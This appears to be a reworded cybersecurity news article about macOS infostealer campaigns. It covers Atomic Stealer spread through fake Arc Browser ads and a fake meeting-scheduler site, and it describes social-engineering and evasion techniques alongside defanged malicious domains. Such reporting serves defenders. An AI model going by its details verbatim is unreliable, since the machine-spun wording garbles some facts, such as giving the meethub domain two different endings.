Malicious ads and fake websites act as a channel to spread two different stealer malware, including Atomic Stealer, targeting Apple macOS users.
Ongoing infostealer attacks against macOS users may have employed multiple methods to compromise victims’ Macs, but they operate with the ultimate goal of stealing sensitive data, Jamf Threat Labs said in a report published Friday.
One such attack chain targets users who search for Arc Browser on search engines like Google to serve fake ads that redirect users to similar sites (“airci[.]net”) that serve the malware.
“Interestingly, the malicious website cannot be accessed directly, as it returns an error,” said security researchers Jaron Bradley, Ferdous Saljooki and Maggie Zirnhelt. “It can only be accessed via a generated sponsored link, presumably to evade detection.”
The disk image file downloaded from the counterfeit website (“ArcSetup.dmg”) provides Atomic Stealer, which is known to prompt users to enter system passwords via a fake message and ultimately facilitate information theft.
Jamf said he also discovered a fake website called meethub[.]gg that claims to offer free group meeting scheduling software, but actually installs another thieving malware that can collect data on users’ keychains, credentials stored in web browsers, and information from cryptocurrency wallets.
Much like Atomic Stealer, the malware – which is said to overlap with a Rust-based stealer family known as Realst – prompts the user for the macOS login password using an AppleScript call to carry out its malicious actions.
Attacks using this malware are said to have approached victims under the guise of discussing job opportunities and interviewing them for a podcastsubsequently asking them to download an app from meethub[.]days to join a video conference provided in the meeting invitations.
“These attacks are often concentrated against those operating in the cryptocurrency industry as such efforts can lead to large gains for the attackers,” the researchers said. “Industry players should be extremely aware that it is often easy to find public information that they are an asset holder or can easily be linked to a company placing them in this industry.”
The development comes as MacPaw Moonlock Lab’s cybersecurity division revealed that malicious DMG files (“App_v1.0.4.dmg”) are being used by threat actors to distribute thieving malware designed to extract credentials and data from various applications.
This is achieved via an obfuscated AppleScript and a bash payload retrieved from a Russian IP address, the former of which is used to launch a deceptive message (as mentioned above) to trick users into providing system passwords.
“Disguised as a harmless DMG file, it tricks the user into installing it via a phishing image, convincing them to bypass the Gatekeeper security feature of macOS,” said security researcher Mykhailo Hrebeniuk.
The development is an indication that macOS environments are increasingly threatened by stealer attacks, with some strains even boasting sophisticated anti-virtualization techniques by activating a self-destructive kill switch to evade detection.
In recent weeks, malvertising campaigns have also been observed pushing the FakeBat loader (also known as EugenLoader) and other information thieves like Rhadamanthys via a Go-based loader through bait sites for popular software like Notion and PuTTY.